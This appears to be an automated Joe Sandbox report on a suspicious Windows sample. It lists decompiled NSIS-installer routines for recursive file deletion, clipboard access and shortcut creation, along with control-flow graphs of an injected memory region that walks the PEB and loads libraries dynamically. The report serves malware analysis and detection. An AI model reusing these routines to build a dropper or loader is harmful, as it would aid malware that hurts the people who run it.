                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                                                                        • OpenClipboard.USER32(00000000), ref: 00405A00
                                                                                        • EmptyClipboard.USER32 ref: 00405A06
                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00405A1C
                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
                                                                                        • CloseClipboard.USER32 ref: 00405A61
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                        • String ID: {
                                                                                        • API String ID: 590372296-366298937
                                                                                        • Opcode ID: 31d53ebfca1d6a6c60948640a960746d46598940cbf3ff3663529959692270eb
                                                                                        • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                                                                        • Opcode Fuzzy Hash: 31d53ebfca1d6a6c60948640a960746d46598940cbf3ff3663529959692270eb
                                                                                        • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 442 405c49-405c6f call 405f14 445 405c71-405c83 DeleteFileW 442->445 446 405c88-405c8f 442->446 447 405e05-405e09 445->447 448 405c91-405c93 446->448 449 405ca2-405cb2 call 40653d 446->449 450 405db3-405db8 448->450 451 405c99-405c9c 448->451 455 405cc1-405cc2 call 405e58 449->455 456 405cb4-405cbf lstrcatW 449->456 450->447 454 405dba-405dbd 450->454 451->449 451->450 457 405dc7-405dcf call 406873 454->457 458 405dbf-405dc5 454->458 460 405cc7-405ccb 455->460 456->460 457->447 466 405dd1-405de5 call 405e0c call 405c01 457->466 458->447 463 405cd7-405cdd lstrcatW 460->463 464 405ccd-405cd5 460->464 465 405ce2-405cfe lstrlenW FindFirstFileW 463->465 464->463 464->465 467 405d04-405d0c 465->467 468 405da8-405dac 465->468 482 405de7-405dea 466->482 483 405dfd-405e00 call 40559f 466->483 470 405d2c-405d40 call 40653d 467->470 471 405d0e-405d16 467->471 468->450 473 405dae 468->473 484 405d42-405d4a 470->484 485 405d57-405d62 call 405c01 470->485 474 405d18-405d20 471->474 475 405d8b-405d9b FindNextFileW 471->475 473->450 474->470 478 405d22-405d2a 474->478 475->467 481 405da1-405da2 FindClose 475->481 478->470 478->475 481->468 482->458 486 405dec-405dfb call 40559f call 4062fd 482->486 483->447 484->475 487 405d4c-405d55 call 405c49 484->487 495 405d83-405d86 call 40559f 485->495 496 405d64-405d67 485->496 486->447 487->475 495->475 497 405d69-405d79 call 40559f call 4062fd 496->497 498 405d7b-405d81 496->498 497->475 498->475
                                                                                        C-Code - Quality: 98%
                                                                                        			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
                                                                                        				signed int _v8;
                                                                                        				signed int _v12;
                                                                                        				short _v556;
                                                                                        				short _v558;
                                                                                        				struct _WIN32_FIND_DATAW _v604;
                                                                                        				signed int _t38;
                                                                                        				signed int _t52;
                                                                                        				signed int _t55;
                                                                                        				signed int _t62;
                                                                                        				void* _t64;
                                                                                        				signed char _t65;
                                                                                        				WCHAR* _t66;
                                                                                        				void* _t67;
                                                                                        				WCHAR* _t68;
                                                                                        				void* _t70;
                                                                                        
                                                                                        				_t65 = _a8;
                                                                                        				_t68 = _a4;
                                                                                        				_v8 = _t65 & 0x00000004;
                                                                                        				_t38 = E00405F14(__eflags, _t68);
                                                                                        				_v12 = _t38;
                                                                                        				if((_t65 & 0x00000008) != 0) {
                                                                                        					_t62 = DeleteFileW(_t68); // executed
                                                                                        					asm("sbb eax, eax");
                                                                                        					_t64 =  ~_t62 + 1;
                                                                                        					 *0x434f88 =  *0x434f88 + _t64;
                                                                                        					return _t64;
                                                                                        				}
                                                                                        				_a4 = _t65;
                                                                                        				_t8 =  &_a4;
                                                                                        				 *_t8 = _a4 & 0x00000001;
                                                                                        				__eflags =  *_t8;
                                                                                        				if( *_t8 == 0) {
                                                                                        					L5:
                                                                                        					E0040653D(0x42f270, _t68);
                                                                                        					__eflags = _a4;
                                                                                        					if(_a4 == 0) {
                                                                                        						E00405E58(_t68);
                                                                                        					} else {
                                                                                        						lstrcatW(0x42f270, L"\\*.*");
                                                                                        					}
                                                                                        					__eflags =  *_t68;
                                                                                        					if( *_t68 != 0) {
                                                                                        						L10:
                                                                                        						lstrcatW(_t68, 0x40a014);
                                                                                        						L11:
                                                                                        						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                                                        						_t38 = FindFirstFileW(0x42f270,  &_v604);
                                                                                        						_t70 = _t38;
                                                                                        						__eflags = _t70 - 0xffffffff;
                                                                                        						if(_t70 == 0xffffffff) {
                                                                                        							L26:
                                                                                        							__eflags = _a4;
                                                                                        							if(_a4 != 0) {
                                                                                        								_t30 = _t66 - 2;
                                                                                        								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                                                        								__eflags =  *_t30;
                                                                                        							}
                                                                                        							goto L28;
                                                                                        						} else {
                                                                                        							goto L12;
                                                                                        						}
                                                                                        						do {
                                                                                        							L12:
                                                                                        							__eflags = _v604.cFileName - 0x2e;
                                                                                        							if(_v604.cFileName != 0x2e) {
                                                                                        								L16:
                                                                                        								E0040653D(_t66,  &(_v604.cFileName));
                                                                                        								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                                                        								if(__eflags == 0) {
                                                                                        									_t52 = E00405C01(__eflags, _t68, _v8);
                                                                                        									__eflags = _t52;
                                                                                        									if(_t52 != 0) {
                                                                                        										E0040559F(0xfffffff2, _t68);
                                                                                        									} else {
                                                                                        										__eflags = _v8 - _t52;
                                                                                        										if(_v8 == _t52) {
                                                                                        											 *0x434f88 =  *0x434f88 + 1;
                                                                                        										} else {
                                                                                        											E0040559F(0xfffffff1, _t68);
                                                                                        											E004062FD(_t67, _t68, 0);
                                                                                        										}
                                                                                        									}
                                                                                        								} else {
                                                                                        									__eflags = (_a8 & 0x00000003) - 3;
                                                                                        									if(__eflags == 0) {
                                                                                        										E00405C49(__eflags, _t68, _a8);
                                                                                        									}
                                                                                        								}
                                                                                        								goto L24;
                                                                                        							}
                                                                                        							__eflags = _v558;
                                                                                        							if(_v558 == 0) {
                                                                                        								goto L24;
                                                                                        							}
                                                                                        							__eflags = _v558 - 0x2e;
                                                                                        							if(_v558 != 0x2e) {
                                                                                        								goto L16;
                                                                                        							}
                                                                                        							__eflags = _v556;
                                                                                        							if(_v556 == 0) {
                                                                                        								goto L24;
                                                                                        							}
                                                                                        							goto L16;
                                                                                        							L24:
                                                                                        							_t55 = FindNextFileW(_t70,  &_v604);
                                                                                        							__eflags = _t55;
                                                                                        						} while (_t55 != 0);
                                                                                        						_t38 = FindClose(_t70);
                                                                                        						goto L26;
                                                                                        					}
                                                                                        					__eflags =  *0x42f270 - 0x5c;
                                                                                        					if( *0x42f270 != 0x5c) {
                                                                                        						goto L11;
                                                                                        					}
                                                                                        					goto L10;
                                                                                        				} else {
                                                                                        					__eflags = _t38;
                                                                                        					if(_t38 == 0) {
                                                                                        						L28:
                                                                                        						__eflags = _a4;
                                                                                        						if(_a4 == 0) {
                                                                                        							L36:
                                                                                        							return _t38;
                                                                                        						}
                                                                                        						__eflags = _v12;
                                                                                        						if(_v12 != 0) {
                                                                                        							_t38 = E00406873(_t68);
                                                                                        							__eflags = _t38;
                                                                                        							if(_t38 == 0) {
                                                                                        								goto L36;
                                                                                        							}
                                                                                        							E00405E0C(_t68);
                                                                                        							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
                                                                                        							__eflags = _t38;
                                                                                        							if(_t38 != 0) {
                                                                                        								return E0040559F(0xffffffe5, _t68);
                                                                                        							}
                                                                                        							__eflags = _v8;
                                                                                        							if(_v8 == 0) {
                                                                                        								goto L30;
                                                                                        							}
                                                                                        							E0040559F(0xfffffff1, _t68);
                                                                                        							return E004062FD(_t67, _t68, 0);
                                                                                        						}
                                                                                        						L30:
                                                                                        						 *0x434f88 =  *0x434f88 + 1;
                                                                                        						return _t38;
                                                                                        					}
                                                                                        					__eflags = _t65 & 0x00000002;
                                                                                        					if((_t65 & 0x00000002) == 0) {
                                                                                        						goto L28;
                                                                                        					}
                                                                                        					goto L5;
                                                                                        				}
                                                                                        			}


















                                                                                        0x00405c53
                                                                                        0x00405c58
                                                                                        0x00405c61
                                                                                        0x00405c64
                                                                                        0x00405c6c
                                                                                        0x00405c6f
                                                                                        0x00405c72
                                                                                        0x00405c7a
                                                                                        0x00405c7c
                                                                                        0x00405c7d
                                                                                        0x00000000
                                                                                        0x00405c7d
                                                                                        0x00405c88
                                                                                        0x00405c8b
                                                                                        0x00405c8b
                                                                                        0x00405c8b
                                                                                        0x00405c8f
                                                                                        0x00405ca2
                                                                                        0x00405ca9
                                                                                        0x00405cae
                                                                                        0x00405cb2
                                                                                        0x00405cc2
                                                                                        0x00405cb4
                                                                                        0x00405cba
                                                                                        0x00405cba
                                                                                        0x00405cc7
                                                                                        0x00405ccb
                                                                                        0x00405cd7
                                                                                        0x00405cdd
                                                                                        0x00405ce2
                                                                                        0x00405ce8
                                                                                        0x00405cf3
                                                                                        0x00405cf9
                                                                                        0x00405cfb
                                                                                        0x00405cfe
                                                                                        0x00405da8
                                                                                        0x00405da8
                                                                                        0x00405dac
                                                                                        0x00405dae
                                                                                        0x00405dae
                                                                                        0x00405dae
                                                                                        0x00405dae
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405d04
                                                                                        0x00405d04
                                                                                        0x00405d04
                                                                                        0x00405d0c
                                                                                        0x00405d2c
                                                                                        0x00405d34
                                                                                        0x00405d39
                                                                                        0x00405d40
                                                                                        0x00405d5b
                                                                                        0x00405d60
                                                                                        0x00405d62
                                                                                        0x00405d86
                                                                                        0x00405d64
                                                                                        0x00405d64
                                                                                        0x00405d67
                                                                                        0x00405d7b
                                                                                        0x00405d69
                                                                                        0x00405d6c
                                                                                        0x00405d74
                                                                                        0x00405d74
                                                                                        0x00405d67
                                                                                        0x00405d42
                                                                                        0x00405d48
                                                                                        0x00405d4a
                                                                                        0x00405d50
                                                                                        0x00405d50
                                                                                        0x00405d4a
                                                                                        0x00000000
                                                                                        0x00405d40
                                                                                        0x00405d0e
                                                                                        0x00405d16
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405d18
                                                                                        0x00405d20
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405d22
                                                                                        0x00405d2a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405d8b
                                                                                        0x00405d93
                                                                                        0x00405d99
                                                                                        0x00405d99
                                                                                        0x00405da2
                                                                                        0x00000000
                                                                                        0x00405da2
                                                                                        0x00405ccd
                                                                                        0x00405cd5
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405c91
                                                                                        0x00405c91
                                                                                        0x00405c93
                                                                                        0x00405db3
                                                                                        0x00405db5
                                                                                        0x00405db8
                                                                                        0x00405e09
                                                                                        0x00405e09
                                                                                        0x00405e09
                                                                                        0x00405dba
                                                                                        0x00405dbd
                                                                                        0x00405dc8
                                                                                        0x00405dcd
                                                                                        0x00405dcf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405dd2
                                                                                        0x00405dde
                                                                                        0x00405de3
                                                                                        0x00405de5
                                                                                        0x00000000
                                                                                        0x00405e00
                                                                                        0x00405de7
                                                                                        0x00405dea
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405def
                                                                                        0x00000000
                                                                                        0x00405df6
                                                                                        0x00405dbf
                                                                                        0x00405dbf
                                                                                        0x00000000
                                                                                        0x00405dbf
                                                                                        0x00405c99
                                                                                        0x00405c9c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405c9c

                                                                                        APIs
                                                                                        • DeleteFileW.KERNELBASE(?,?,77473420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                                                                        • lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405CBA
                                                                                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                                                                                        • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,77473420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                                                                        • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,77473420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                                                                        • FindClose.KERNEL32(00000000), ref: 00405DA2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                        • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                        • API String ID: 2035342205-1953461807
                                                                                        • Opcode ID: 2ea8aa6a8d4f7201961980de833ab884f2753d9f6dddac351d402a454eb76660
                                                                                        • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                                                                        • Opcode Fuzzy Hash: 2ea8aa6a8d4f7201961980de833ab884f2753d9f6dddac351d402a454eb76660
                                                                                        • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 708 2a4cb44-2a4cbac GetPEB 710 2a4cbaf-2a4cbd8 708->710 711 2a4cbde-2a4cc6f 710->711 712 2a4d2da-2a4d2dd 710->712 715 2a4cc75-2a4cc7f 711->715 714 2a4de29-2a4de36 712->714 716 2a4de38-2a4de47 714->716 715->715 717 2a4cc81-2a4cce9 715->717 716->716 718 2a4de4a-2a4de60 716->718 723 2a4cceb-2a4cd6a 717->723 720 2a4de62-2a4df13 718->720 721 2a4ddfb-2a4de16 718->721 723->710 727 2a4cd70-2a4cd73 723->727 727->723 728 2a4cd79-2a4cd7d 727->728 728->723 729 2a4cd83-2a4ce2c 728->729 731 2a55744-2a5584e call 2a557e7 729->731 732 2a4ce32-2a4ced6 call 2a59d00 729->732 731->714 742 2a55854-2a5586e 731->742 739 2a4ced8-2a4cedf 732->739 739->739 741 2a4cee1-2a4cfcb 739->741 747 2a4cfd5-2a4cfdc 741->747 744 2a55874-2a55908 call 2a56045 call 2a55925 742->744 745 2a5590a-2a55922 LoadLibraryA call 2a55925 742->745 744->745 747->747 750 2a4cfde-2a4d096 747->750 754 2a4d099-2a4d0a0 750->754 754->754 757 2a4d0a2-2a4d12a 754->757 760 2a4d130-2a4d162 757->760 761 2a440aa-2a440e5 call 2a43e2c 757->761 762 2a4d164-2a4d16b 760->762 761->708 762->762 765 2a4d16d-2a4d1ee 762->765 765->714 767 2a4d1f4-2a4d2d4 765->767 767->712
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213833253823.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2a40000_SecuriteInfo.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 7$^{hk$pSz9
                                                                                        • API String ID: 0-116459045
                                                                                        • Opcode ID: eb26ae84ca416042ec8e4a84a5128c24f4fa16594a2911c3a3380fe39f39bf4d
                                                                                        • Instruction ID: 0a3778438364b43c8e09a282bb649869ef871372c36c8b201a0d2882d424d853
                                                                                        • Opcode Fuzzy Hash: eb26ae84ca416042ec8e4a84a5128c24f4fa16594a2911c3a3380fe39f39bf4d
                                                                                        • Instruction Fuzzy Hash: 55F13471604355DFCB358E38C9997DA37B2EF963A0FA4416ECC8A8B605DB328946CF41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 769 2a495a8-2a495be 770 2a495c4-2a497f5 call 2a49726 call 2a591d8 769->770 771 2a55744-2a5584e call 2a557e7 769->771 797 2a49ca5-2a49d1e 770->797 798 2a497fb-2a499bc call 2a49846 call 2a4991d 770->798 781 2a55854-2a5586e 771->781 782 2a4de29-2a4de36 771->782 784 2a55874-2a55908 call 2a56045 call 2a55925 781->784 785 2a5590a-2a55922 LoadLibraryA call 2a55925 781->785 786 2a4de38-2a4de47 782->786 784->785 786->786 790 2a4de4a-2a4de60 786->790 794 2a4de62-2a4df13 790->794 795 2a4ddfb-2a4de16 790->795 797->771 798->797 814 2a499c2-2a499dc 798->814 814->771 815 2a499e2-2a499ec 814->815 816 2a49a0e-2a49a91 815->816 817 2a499ee-2a49a0b call 2a591d8 815->817 821 2a49c75-2a49c96 816->821 822 2a49a97-2a49aaa 816->822 817->816 823 2a49ab0-2a49b87 822->823 824 2a440aa-2a4cbac call 2a43e2c GetPEB 822->824 823->824 828 2a49b8d-2a49bb5 823->828 837 2a4cbaf-2a4cbd8 824->837 829 2a59d00-2a59dbe call 2a59d94 828->829 830 2a49bbb-2a49c5a 828->830 844 2a59dbf-2a59dec 829->844 830->829 836 2a49c60-2a49c70 call 2a591d8 830->836 836->821 840 2a4cbde-2a4cc6f 837->840 841 2a4d2da-2a4d2dd 837->841 845 2a4cc75-2a4cc7f 840->845 841->782 844->844 846 2a59dee-2a59df2 844->846 845->845 847 2a4cc81-2a4cce9 845->847 849 2a4cceb-2a4cd6a 847->849 849->837 851 2a4cd70-2a4cd73 849->851 851->849 852 2a4cd79-2a4cd7d 851->852 852->849 853 2a4cd83-2a4ce2c 852->853 853->771 855 2a4ce32-2a4ced6 call 2a59d00 853->855 859 2a4ced8-2a4cedf 855->859 859->859 860 2a4cee1-2a4cfcb 859->860 862 2a4cfd5-2a4cfdc 860->862 862->862 863 2a4cfde-2a4d096 862->863 865 2a4d099-2a4d0a0 863->865 865->865 866 2a4d0a2-2a4d12a 865->866 866->824 869 2a4d130-2a4d162 866->869 870 2a4d164-2a4d16b 869->870 870->870 871 2a4d16d-2a4d1ee 870->871 871->782 873 2a4d1f4-2a4d2d4 871->873 873->841
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNELBASE(68172F4F), ref: 02A5590D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213833253823.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2a40000_SecuriteInfo.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID: 9ywo$9ywo$VZa
                                                                                        • API String ID: 1029625771-2049832778
                                                                                        • Opcode ID: f7bd37f9bcb0a8143e5343627cb7c255c52b8ef77414bb4cf60f933d2e84c47f
                                                                                        • Instruction ID: 95b801985c49c11222018a98e1a96a36a138b492e7a69dc7509b891624805fd8
                                                                                        • Opcode Fuzzy Hash: f7bd37f9bcb0a8143e5343627cb7c255c52b8ef77414bb4cf60f933d2e84c47f
                                                                                        • Instruction Fuzzy Hash: C1E16B71A08356DFCF349E388D957EF37A2AF95760F95412EDC899B104DB318982CB42
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 67%
                                                                                        			E004021AA(void* __eflags) {
                                                                                        				signed int _t52;
                                                                                        				void* _t56;
                                                                                        				intOrPtr* _t60;
                                                                                        				intOrPtr _t61;
                                                                                        				intOrPtr* _t62;
                                                                                        				intOrPtr* _t64;
                                                                                        				intOrPtr* _t66;
                                                                                        				intOrPtr* _t68;
                                                                                        				intOrPtr* _t70;
                                                                                        				intOrPtr* _t72;
                                                                                        				intOrPtr* _t74;
                                                                                        				intOrPtr* _t76;
                                                                                        				intOrPtr* _t78;
                                                                                        				intOrPtr* _t80;
                                                                                        				void* _t83;
                                                                                        				intOrPtr* _t91;
                                                                                        				signed int _t101;
                                                                                        				signed int _t105;
                                                                                        				void* _t107;
                                                                                        
                                                                                        				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                                                        				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                                                        				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                                                        				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                                                                        				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                                                        				_t52 =  *(_t107 - 0x20);
                                                                                        				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                                                        				_t101 = _t52 & 0x00008000;
                                                                                        				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                                                        				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                                                        				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                                                        					E00402DA6(0x21);
                                                                                        				}
                                                                                        				_t56 = _t107 + 8;
                                                                                        				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56); // executed
                                                                                        				if(_t56 < _t83) {
                                                                                        					L14:
                                                                                        					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                                                        					_push(0xfffffff0);
                                                                                        				} else {
                                                                                        					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                                                        					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
                                                                                        					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                                                        					if(_t61 >= _t83) {
                                                                                        						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                                                        						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                                                        						if(_t101 == _t83) {
                                                                                        							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                                                        							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Local\\Temp");
                                                                                        						}
                                                                                        						if(_t105 != _t83) {
                                                                                        							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                                                        							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                                                        						}
                                                                                        						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                                                        						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                                                        						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                                                        						if( *_t91 != _t83) {
                                                                                        							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                                                        							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                                                        						}
                                                                                        						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                                                        						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                                                        						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                                                        						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                                                        						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                                        							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                                                        							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                                                        						}
                                                                                        						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                                                        						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                        					}
                                                                                        					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                                                        					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                                        					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                                        						_push(0xfffffff4);
                                                                                        					} else {
                                                                                        						goto L14;
                                                                                        					}
                                                                                        				}
                                                                                        				E00401423();
                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
                                                                                        				return 0;
                                                                                        			}






















                                                                                        0x004021b3
                                                                                        0x004021bd
                                                                                        0x004021c7
                                                                                        0x004021d1
                                                                                        0x004021dc
                                                                                        0x004021df
                                                                                        0x004021f9
                                                                                        0x004021fc
                                                                                        0x00402202
                                                                                        0x00402205
                                                                                        0x0040220f
                                                                                        0x00402213
                                                                                        0x00402213
                                                                                        0x00402218
                                                                                        0x00402229
                                                                                        0x00402231
                                                                                        0x004022e8
                                                                                        0x004022e8
                                                                                        0x004022ef
                                                                                        0x00402237
                                                                                        0x00402237
                                                                                        0x00402246
                                                                                        0x0040224a
                                                                                        0x0040224d
                                                                                        0x00402253
                                                                                        0x00402261
                                                                                        0x00402264
                                                                                        0x00402266
                                                                                        0x00402271
                                                                                        0x00402271
                                                                                        0x00402276
                                                                                        0x00402278
                                                                                        0x0040227f
                                                                                        0x0040227f
                                                                                        0x00402282
                                                                                        0x0040228b
                                                                                        0x0040228e
                                                                                        0x00402294
                                                                                        0x00402296
                                                                                        0x004022a0
                                                                                        0x004022a0
                                                                                        0x004022a3
                                                                                        0x004022ac
                                                                                        0x004022af
                                                                                        0x004022b8
                                                                                        0x004022be
                                                                                        0x004022c0
                                                                                        0x004022ce
                                                                                        0x004022ce
                                                                                        0x004022d1
                                                                                        0x004022d7
                                                                                        0x004022d7
                                                                                        0x004022da
                                                                                        0x004022e0
                                                                                        0x004022e6
                                                                                        0x004022fb
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004022e6
                                                                                        0x004022f1
                                                                                        0x00402c2d
                                                                                        0x00402c39

                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
